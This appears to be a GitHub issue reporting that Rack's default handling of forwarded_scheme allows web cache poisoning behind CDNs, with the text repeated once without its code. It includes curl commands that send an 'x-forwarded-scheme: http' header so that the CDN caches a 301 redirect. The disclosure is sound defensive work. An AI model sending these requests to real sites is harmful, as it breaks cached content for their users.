Hi! I believe there default rack behavior of forwarded_scheme creates a cache poisoning vulnerability in common configurations. This was initially disclosed almost a year ago in the blog post Cache Poisoning At Scale, and I am starting to see it used by pentesters. As I don't an issue or fix, I wanted to document it here.
In short, many CDNs use X-Forwarded-Proto to convey the original request protocol. But, rack prefers X-Forwarded-Scheme, this creates a simple opportunity for a cache poisoning attack.
This is a bit hard to show, but if you assume the rack URL has a CDN in front of it:
URL=https://rack.example.com/assets/image.png?cachebust=${RANDOM}
curl -i $URL
# Observe that the `x-cache` response is MISS.
curl -i $URL
# Observe that the `x-cache` response is now HIT
##
## Attack
##
URL=https://rack.example.com/assets/image.png?cachebust=${RANDOM}
curl -H 'x-forwarded-scheme: http' -i $URL
# Observe the 301 response, and `x-cache: MISS`
curl -i $URL
# observe a cached 301This is something I had to patch on our CDN, and it sounds like something many sites have had to patch as well. (The previously linked blog post lists several notable sites. Here is the hackerone discussion)
Hi! I believe there default rack behavior of
forwarded_schemecreates a cache poisoning vulnerability in common configurations. This was initially disclosed almost a year ago in the blog post Cache Poisoning At Scale, and I am starting to see it used by pentesters. As I don't an issue or fix, I wanted to document it here.In short, many CDNs use
X-Forwarded-Prototo convey the original request protocol. But, rack prefersX-Forwarded-Scheme, this creates a simple opportunity for a cache poisoning attack.This is a bit hard to show, but if you assume the
rackURL has a CDN in front of it:This is something I had to patch on our CDN, and it sounds like something many sites have had to patch as well. (The previously linked blog post lists several notable sites. Here is the hackerone discussion)